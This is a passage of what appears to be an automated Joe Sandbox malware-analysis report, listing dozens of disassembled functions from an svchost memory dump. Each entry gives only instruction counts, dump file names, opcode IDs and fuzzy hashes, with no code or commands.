                                                                                                                  Function 03D0539D Relevance: .0, Instructions: 31COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: db965e963c3a7328d842496dbdecf226c5bd855adb4139d26c8bfa48f74c256e
                                                                                                                  • Instruction ID: 7bba370ebbc72b94a95092e80edf4eba6f4709141e2ba81da4ff0940410dc4c0
                                                                                                                  • Opcode Fuzzy Hash: db965e963c3a7328d842496dbdecf226c5bd855adb4139d26c8bfa48f74c256e
                                                                                                                  • Instruction Fuzzy Hash: C7F09A74E10348EBDB04EBB9E445BAEB7B4EB08600F108059A901EB280DAB4D9019B24
                                                                                                                  Function 03D052E2 Relevance: .0, Instructions: 31COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9d7a2968ef1b5899ba30c21365a63d928fc8e7ccf21dce8e29e06548bb03c514
                                                                                                                  • Instruction ID: ded371e07e1748941e691deec43cc4bca7c56cff267a7c622fcafeac880bfe34
                                                                                                                  • Opcode Fuzzy Hash: 9d7a2968ef1b5899ba30c21365a63d928fc8e7ccf21dce8e29e06548bb03c514
                                                                                                                  • Instruction Fuzzy Hash: FCF0BE74A10388ABDB04EFB9E905E6EB7B4FF14700F044059A801EB2C0EA74D900DB54
                                                                                                                  Function 03D05283 Relevance: .0, Instructions: 31COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 12f0ab0c003108f49b16120f664dd0bb9119ea8cb249ca7f88dd299e054ccd7a
                                                                                                                  • Instruction ID: f83c39e30eaada003709eb97964c0163f681bc15705a4c308b76dcdf4cefb105
                                                                                                                  • Opcode Fuzzy Hash: 12f0ab0c003108f49b16120f664dd0bb9119ea8cb249ca7f88dd299e054ccd7a
                                                                                                                  • Instruction Fuzzy Hash: 75F0BE78A10348EFDB04EBB9E905FAEB7B4FF04700F004459A841EB3C1EA74DA009B54
                                                                                                                  Function 03C72619 Relevance: .0, Instructions: 31COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                  • Instruction ID: 5454cd1563acdc3bee0c0a4f5547bf1545a0385d7877bf5e38eccf05c10ae5fa
                                                                                                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                  • Instruction Fuzzy Hash: 8FE092723006006BD721DE59CC80F47776EAF86B10F05047AB904DE251CAE69D0982A4
                                                                                                                  Function 03D05341 Relevance: .0, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d7e84d68ba4e24a1beb774b95633ff2e910463e9f4746b1619f8e0559867b28d
                                                                                                                  • Instruction ID: 800551065526d0bbd28660149b07a6e8a5caeb93abc95094fca58fce0a0908e7
                                                                                                                  • Opcode Fuzzy Hash: d7e84d68ba4e24a1beb774b95633ff2e910463e9f4746b1619f8e0559867b28d
                                                                                                                  • Instruction Fuzzy Hash: 16F02774E0434DEBCB04EBB9E845E9EB7B4EF09700F100059E801EB3D0EA74D9009714
                                                                                                                  Function 03C67208 Relevance: .0, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b1febe9a29e817114b347e1798c5b18e3e55451a9cb4a4455448346f185f5fd1
                                                                                                                  • Instruction ID: b5deb4219d9a6fe05607c887b2fdc8303a372903088216600866b280c831869b
                                                                                                                  • Opcode Fuzzy Hash: b1febe9a29e817114b347e1798c5b18e3e55451a9cb4a4455448346f185f5fd1
                                                                                                                  • Instruction Fuzzy Hash: C0F020B1911A869FC722E72EC0C4F22B3E99F00B78F0D84A0D809CF701CBA8D980C290
                                                                                                                  Function 03D05227 Relevance: .0, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ef1b5205e17e6b4cba9483183e2f2624dd854ba19d7616f05c8b5c79df4cdd21
                                                                                                                  • Instruction ID: 56dfea8232f35617044c5582f6a18dc9be27d963a23747c4f01d63d80567c699
                                                                                                                  • Opcode Fuzzy Hash: ef1b5205e17e6b4cba9483183e2f2624dd854ba19d7616f05c8b5c79df4cdd21
                                                                                                                  • Instruction Fuzzy Hash: 4BF08274A14348ABDB14EBB9E905F6EB7B8EF44704F050459A901EB2C1EA74DA009759
                                                                                                                  Function 03D051CB Relevance: .0, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 09ad0b0c6c8f3688280cbf6112972ab17eb58a3732f44c69fd1aa3f4e44a012a
                                                                                                                  • Instruction ID: 182c71e739b34bfeb4df7ec9519b3ddee5cb5b91be06e3327e5d5d33248f8de3
                                                                                                                  • Opcode Fuzzy Hash: 09ad0b0c6c8f3688280cbf6112972ab17eb58a3732f44c69fd1aa3f4e44a012a
                                                                                                                  • Instruction Fuzzy Hash: 3DF08274A14248EBDB04EBB9E905F6EB7B4FF04704F050059A941EB2C1EA74E900DB59
                                                                                                                  Function 03CEF72E Relevance: .0, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7bbf317355bd7ee605832070697460d22e264af68120c8a0ebecc8e987d73070
                                                                                                                  • Instruction ID: 8ab750c49cdb7cd595c22baa4f9886dd8be943df51a8d57e4e8f42c7df597337
                                                                                                                  • Opcode Fuzzy Hash: 7bbf317355bd7ee605832070697460d22e264af68120c8a0ebecc8e987d73070
                                                                                                                  • Instruction Fuzzy Hash: A3F0A775A10348EBDB04EBB9D559E9E77B4EF08704F060059E541EF3C0D974D901A759
                                                                                                                  Function 03C30710 Relevance: .0, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                  • Instruction ID: 87a12ad40f9cf34ee92673e01622df3132510b56eeeac4861ce5204a6ca8c130
                                                                                                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                  • Instruction Fuzzy Hash: 79F06D3E3047949BDB16DF2AD050AA57BA8EB46364B0500D9E846CF351EB31EAC2CB94
                                                                                                                  Function 03C655C0 Relevance: .0, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                  • Instruction ID: 18fccb569884bb7a0056fc2d77e33395522d54df3a61aa87653b53d0ad030edc
                                                                                                                  • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                  • Instruction Fuzzy Hash: 95E0E533104614ABC221AA16DC18F12FBA9FF917B0F258215A559DB590CB60A911DAD4
                                                                                                                  Function 03D037B6 Relevance: .0, Instructions: 27COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                  • Instruction ID: 52cc8818afe91b07db853a3a64a24060d7a3d10607d524bb6d8fb5902960521f
                                                                                                                  • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                  • Instruction Fuzzy Hash: 21E06D76210200AFE764DB58CD05FA673ACEB40B60F150258B515D70D0DBB0AE40CA60
                                                                                                                  Function 03CEB3D0 Relevance: .0, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                  • Instruction ID: 7ecc973c1769ec0f2cbfe555df3d60c60431597a215ed0e215d2c2cbb7eaf25f
                                                                                                                  • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                  • Instruction Fuzzy Hash: E3E0CD35244314B7DB22AA40CC00F797B15DB407D0F118031FB08DE650C5719D51E6D4
                                                                                                                  Function 03C2823B Relevance: .0, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                  • Instruction ID: 0735f13feaa6e0276769938e5476d0e95e4f29de0a4dc4c54aa966010bdaabd5
                                                                                                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                  • Instruction Fuzzy Hash: 59E08C35101B20EEDB31FF12DC04F527AA5FB84B50F164969E482CE4A48BB0AC91EA44
                                                                                                                  Function 03CB92BC Relevance: .0, Instructions: 20COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1a85336327f86bc6edbed0671a86a272e95ff036d29e47ee339cb71028902596
                                                                                                                  • Instruction ID: 125a70e25ffe6558b28bcf92848992d32ae806ef62701d1ec91a3b788231c1c5
                                                                                                                  • Opcode Fuzzy Hash: 1a85336327f86bc6edbed0671a86a272e95ff036d29e47ee339cb71028902596
                                                                                                                  • Instruction Fuzzy Hash: 2AF0E535651B84CFE72ADF08D1E2F91B3BAFB65B44F500458D446CFBA1C73AAA42CA40
                                                                                                                  Function 03C32050 Relevance: .0, Instructions: 20COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 640ae5e4a702fa018663e70a754fd336ebfc89bbf86a6e50ee7eae7c1ef1d67d
                                                                                                                  • Instruction ID: 05b961014d58bd53b5cca6d95c986c66ee80bc894913873fdc98b64cb312df63
                                                                                                                  • Opcode Fuzzy Hash: 640ae5e4a702fa018663e70a754fd336ebfc89bbf86a6e50ee7eae7c1ef1d67d
                                                                                                                  • Instruction Fuzzy Hash: 36E0C2332007906BC721FB5DDD00F8A73AEEFA53A0F024221F150CB690CA60EC00D794
                                                                                                                  Function 03C2A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                  • Instruction ID: e8f7dc10c910495732127aeee6bc3712225556ef60d2d53a196366e0f80a9bde
                                                                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                  • Instruction Fuzzy Hash: CCD0123A31617097CB29E6566914F67BD159BC5AA4F1A016D780AD7900CD158C42E6E0
                                                                                                                  Function 03C402A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                  • Instruction ID: 1c0462645c36cdf0474f9257489164cb9fbaf1c77018e06211ea7fa06bafb8d3
                                                                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                  • Instruction Fuzzy Hash: B8D0C935252E81CFD62ACF0DC5A4B16B3B8BB44B44F8604D0E501CBB61D66CEA40CE00
                                                                                                                  Function 03CB930B Relevance: .0, Instructions: 12COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                  • Instruction ID: 515e16e59f7e986cebb3101ac59683fd6826bac4e1b83e2fe525bd65ade7665e
                                                                                                                  • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                  • Instruction Fuzzy Hash: E2D05E35945AC4CFE727CB08C165B907BF8F705B40F890098E0428BBA2C37C9A84CB10
                                                                                                                  Function 03C6C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                  • Instruction ID: 0739117aced7e209daf7f718c1b25cc6fe6254657a345a45e752a03bef9e5298
                                                                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                  • Instruction Fuzzy Hash: 90C0123A290688AFC712EA98CD01F027BA9EB98B80F014021F6048B670C631E820EA84
                                                                                                                  Function 03C50310 Relevance: .0, Instructions: 11COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                  • Instruction ID: af6cc01c1105e08974ba28cad21c1b442f453ef79e4d5d8ced204fd8aa62431e
                                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                  • Instruction Fuzzy Hash: 4AD01236100248EFCB01DF41C890D9A772AFBD8710F148019FD194B610CA31ED62DA50
                                                                                                                  Function 03C30750 Relevance: .0, Instructions: 9COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                  • Instruction ID: b78394523fbcc826d887ce2e392feda29ae03ba974a0804cc97a4bb7a47ae7e8
                                                                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                  • Instruction Fuzzy Hash: 15C04879B11A818FCF15EB2AD294F4977E8FB84744F1A08D0E805CFB21E624EA11DA10
                                                                                                                  Function 03C74340 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f6a1fea4665c68775600945c68527f886cf85770db7a8e32eea73671f6144c3c
                                                                                                                  • Instruction ID: d9207e47c900c21a26f1f008bb449648049f154fc077c928e4db173c3af88a4a
                                                                                                                  • Opcode Fuzzy Hash: f6a1fea4665c68775600945c68527f886cf85770db7a8e32eea73671f6144c3c
                                                                                                                  • Instruction Fuzzy Hash: CC900271605904129141B25848C45C6400697E0705B96C011E042C598C8B148B565361
                                                                                                                  Function 03C73090 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 921e7da90aee502a168f58cb787e620a7bb052eb0bd19b5734fe8e1115e9289a
                                                                                                                  • Instruction ID: 5e73577c256afb0f2e4224b975434118a4d9fc5e23f65ad3b760169dd3c94409
                                                                                                                  • Opcode Fuzzy Hash: 921e7da90aee502a168f58cb787e620a7bb052eb0bd19b5734fe8e1115e9289a
                                                                                                                  • Instruction Fuzzy Hash: 1190026124150C02D141B25884547870007C7D0B05F96C011A002C598D87168B6566B1
                                                                                                                  Function 03C73010 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d89fa28f4e4dae07eecbc4d38ffa4db5bccbeba74fb5ea859bdc64c0fa0d1d86
                                                                                                                  • Instruction ID: 2b2f1c7b56368b0ba0206c1bcaeac6d0a73628fd64a280b13bf714149cf5c21f
                                                                                                                  • Opcode Fuzzy Hash: d89fa28f4e4dae07eecbc4d38ffa4db5bccbeba74fb5ea859bdc64c0fa0d1d86
                                                                                                                  • Instruction Fuzzy Hash: 1B90026120194842D141B3584844B8F410687E1706FD6C019A415E598CCA158A555721
                                                                                                                  Function 03C74650 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1cf569dc05e96d32a3de8ec8f6a2522bb16e70576c8ebd9938cb955ea2c59d82
                                                                                                                  • Instruction ID: 8c9c457570570642dd4c9970c2f4061f84117d5ad86024db98de2352c4182ade
                                                                                                                  • Opcode Fuzzy Hash: 1cf569dc05e96d32a3de8ec8f6a2522bb16e70576c8ebd9938cb955ea2c59d82
                                                                                                                  • Instruction Fuzzy Hash: EC9002A1601604424141B2584844486600697E17053D6C115A055C5A4C87188A559269
                                                                                                                  Function 03C72BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f468998828c7c21b8d10737fab4daf925a0115e8293e0ab912a7cb3c0be754f1
                                                                                                                  • Instruction ID: a619991b01414a5cf53e4941cf349c28daf4f1760801d6ea0275baa4ad3d4f91
                                                                                                                  • Opcode Fuzzy Hash: f468998828c7c21b8d10737fab4daf925a0115e8293e0ab912a7cb3c0be754f1
                                                                                                                  • Instruction Fuzzy Hash: 5890027120554C42D141B2584444AC6001687D0709F96C011A006C6D8D97258F55B661
                                                                                                                  Function 03C72BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27353ca2fa6e462000efc1565e19cec3a879680fafe186e21852311c651db2e1
                                                                                                                  • Instruction ID: 4ade4d89b8fd8c6dbf348899a9d592f55c2c63e515dd70313f3064eedb98d575
                                                                                                                  • Opcode Fuzzy Hash: 27353ca2fa6e462000efc1565e19cec3a879680fafe186e21852311c651db2e1
                                                                                                                  • Instruction Fuzzy Hash: 9A90027120150C02D181B25844446CA000687D1705FD6C015A002D698DCB158B5977A1
                                                                                                                  Function 03C72B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a0a6fd17d6b356deca95e2cbbdc6b571797c2bd4ab72b72caa470a2c01e20020
                                                                                                                  • Instruction ID: 35c1e27b78686efcc3ee82ffe8a177864db586c5686cb8ff66742f92ef002207
                                                                                                                  • Opcode Fuzzy Hash: a0a6fd17d6b356deca95e2cbbdc6b571797c2bd4ab72b72caa470a2c01e20020
